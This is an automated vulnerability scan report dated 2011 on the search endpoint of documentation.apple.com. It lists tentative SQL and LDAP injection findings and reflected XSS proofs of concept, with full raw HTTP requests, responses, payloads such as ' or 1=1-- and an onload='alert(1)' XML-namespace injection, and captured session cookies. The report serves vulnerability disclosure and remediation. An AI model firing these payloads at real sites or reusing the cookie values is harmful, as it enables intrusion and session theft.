XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, documentation.apple.com

Report generated by XSS.CX at Wed Jul 20 06:06:15 CDT 2011.


1. SQL injection

1.1. http://documentation.apple.com/cgi-bin/sp/nph-search [name of an arbitrarily supplied request parameter]

1.2. http://documentation.apple.com/cgi-bin/sp/nph-search [q parameter]

2. LDAP injection

3. Cross-site scripting (reflected)

3.1. http://documentation.apple.com/cgi-bin/sp/nph-search [getfields parameter]

3.2. http://documentation.apple.com/cgi-bin/sp/nph-search [q parameter]

4. Credit card numbers disclosed

5. Robots.txt file

6. Content type incorrectly stated



1. SQL injection
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://documentation.apple.com/cgi-bin/sp/nph-search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 82552428'%20or%201%3d1--%20 and 82552428'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss&182552428'%20or%201%3d1--%20=1 HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response 1

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1059
Vary: Accept-Encoding
Cache-Control: max-age=543
Expires: Fri, 15 Jul 2011 20:20:19 GMT
Date: Fri, 15 Jul 2011 20:11:16 GMT
Connection: close

{"GSP":{"Q":{"$t":"xss"},"TM":{"$t":"0.020032"},"VER":"3.2","PARAM":[{"value":"xss","name":"q","original_value":"xss"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend","name":"client","original_value":"default_frontend"},{"value":"documentation","name":"site","original_value":"documentation"},{"value":"","name":"start","original_value":""},{"value":"p","name":"access","original_value":"p"},{"value":"50","name":"num","original_value":"50"},{"value":"lang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationName","name":"getfields","original_value":"bookName.pageName.ApplicationName"},{"value":"0","name":"numgm","original_value":"0"},{"value":"0","name":"filter","original_value":"0"},{"value":"17.149.0.24","name":"ip","original_value":"17.149.0.24"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"}]}}

Request 2

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss&182552428'%20or%201%3d2--%20=1 HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=...[SNIP]...; geo=US

Response 2

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1109
Vary: Accept-Encoding
Cache-Control: max-age=564
Expires: Fri, 15 Jul 2011 20:20:41 GMT
Date: Fri, 15 Jul 2011 20:11:17 GMT
Connection: close

{"GSP":{"Q":{"$t":"xss"},"TM":{"$t":"0.018473"},"VER":"3.2","PARAM":[{"value":"xss","name":"q","original_value":"xss"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend","name":"client","original_value":"default_frontend"},{"value":"documentation","name":"site","original_value":"documentation"},{"value":"","name":"start","original_value":""},{"value":"p","name":"access","original_value":"p"},{"value":"50","name":"num","original_value":"50"},{"value":"lang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationName","name":"getfields","original_value":"bookName.pageName.ApplicationName"},{"value":"0","name":"numgm","original_value":"0"},{"value":"0","name":"filter","original_value":"0"},{"value":"17.149.0.21","name":"ip","original_value":"17.149.0.21"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"},{"value":"0","name":"entsp","original_value":"0"}]}}

1.2. http://documentation.apple.com/cgi-bin/sp/nph-search [q parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The q parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the q parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss'%20and%201%3d1--%20 HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response 1

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1187
Vary: Accept-Encoding
Cache-Control: max-age=549
Expires: Fri, 15 Jul 2011 20:20:18 GMT
Date: Fri, 15 Jul 2011 20:11:09 GMT
Connection: close

{"GSP":{"Spelling":{"Suggestion":{"$t":"<b><i>x ss</i></b>&#39; and 1=1--","q":"x ss' and 1=1--"}},"Q":{"$t":"xss' and 1=1--"},"TM":{"$t":"0.023180"},"VER":"3.2","PARAM":[{"value":"xss' and 1=1-- ","n
...[SNIP]...
_value":"0"},{"value":"17.149.0.23","name":"ip","original_value":"17.149.0.23"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"}]}}

Request 2

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss'%20and%201%3d2--%20 HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=...[SNIP]...; geo=US

Response 2

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1237
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Fri, 15 Jul 2011 20:21:09 GMT
Date: Fri, 15 Jul 2011 20:11:09 GMT
Connection: close

{"GSP":{"Spelling":{"Suggestion":{"$t":"<b><i>x ss</i></b>&#39; and 1=2--","q":"x ss' and 1=2--"}},"Q":{"$t":"xss' and 1=2--"},"TM":{"$t":"0.018260"},"VER":"3.2","PARAM":[{"value":"xss' and 1=2-- ","n
...[SNIP]...
value":"0"},{"value":"17.149.0.23","name":"ip","original_value":"17.149.0.23"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"},{"value":"0","name":"entsp","original_value":"0"}]}}

2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The q parameter appears to be vulnerable to LDAP injection attacks.

The payloads 3097717966f67c5a)(sn=* and 3097717966f67c5a)!(sn=* were each submitted in the q parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=3097717966f67c5a)(sn=* HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=...[SNIP]...; geo=US

Response 1

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1168
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Fri, 15 Jul 2011 20:27:29 GMT
Date: Fri, 15 Jul 2011 20:17:29 GMT
Connection: close

{"GSP":{"Q":{"$t":"3097717966f67c5a)(sn=*"},"TM":{"$t":"0.020022"},"VER":"3.2","PARAM":[{"value":"3097717966f67c5a)(sn=*","name":"q","original_value":"3097717966f67c5a)(sn%3D*"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend","name":"client","original_value":"default_frontend"},{"value":"documentation","name":"site","original_value":"documentation"},{"value":"","name":"start","original_value":""},{"value":"p","name":"access","original_value":"p"},{"value":"50","name":"num","original_value":"50"},{"value":"lang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationName","name":"getfields","original_value":"bookName.pageName.ApplicationName"},{"value":"0","name":"numgm","original_value":"0"},{"value":"0","name":"filter","original_value":"0"},{"value":"17.149.0.22","name":"ip","original_value":"17.149.0.22"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"},{"value":"0","name":"entsp","original_value":"0"}]}}

Request 2

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=3097717966f67c5a)!(sn=* HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=...[SNIP]...; geo=US

Response 2

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1121
Vary: Accept-Encoding
Cache-Control: max-age=572
Expires: Fri, 15 Jul 2011 20:27:02 GMT
Date: Fri, 15 Jul 2011 20:17:30 GMT
Connection: close

{"GSP":{"Q":{"$t":"3097717966f67c5a)!(sn=*"},"TM":{"$t":"0.016935"},"VER":"3.2","PARAM":[{"value":"3097717966f67c5a)!(sn=*","name":"q","original_value":"3097717966f67c5a)!(sn%3D*"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend","name":"client","original_value":"default_frontend"},{"value":"documentation","name":"site","original_value":"documentation"},{"value":"","name":"start","original_value":""},{"value":"p","name":"access","original_value":"p"},{"value":"50","name":"num","original_value":"50"},{"value":"lang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationName","name":"getfields","original_value":"bookName.pageName.ApplicationName"},{"value":"0","name":"numgm","original_value":"0"},{"value":"0","name":"filter","original_value":"0"},{"value":"17.149.0.23","name":"ip","original_value":"17.149.0.23"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"}]}}

3. Cross-site scripting (reflected)
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://documentation.apple.com/cgi-bin/sp/nph-search [getfields parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The value of the getfields request parameter is copied into the XML document as plain text between tags. The payload ebced<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8651bd2c284 was submitted in the getfields parameter. This input was echoed as ebced<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8651bd2c284 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationNameebced<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8651bd2c284&q=xss HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=...[SNIP]...; geo=US

Response

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Fri, 15 Jul 2011 20:21:00 GMT
Date: Fri, 15 Jul 2011 20:11:00 GMT
Connection: close

{"GSP":{"Q":{"$t":"xss"},"TM":{"$t":"0.036331"},"VER":"3.2","PARAM":[{"value":"xss","name":"q","original_value":"xss"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend
...[SNIP]...
ang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationNameebced<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8651bd2c284","name":"getfields","original_value":"bookName.pageName.ApplicationNameebced%3Ca+xmlns%3Aa%3D'http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml'%3E%3Ca%3Abody+onload%3D'alert(1)'%2F%3E%3C%2Fa%3E8651bd2c284"},{"v
...[SNIP]...

3.2. http://documentation.apple.com/cgi-bin/sp/nph-search [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The value of the q request parameter is copied into the XML document as plain text between tags. The payload 8d376<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>aa2eaeea1ca was submitted in the q parameter. This input was echoed as 8d376<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>aa2eaeea1ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss8d376<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>aa2eaeea1ca HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
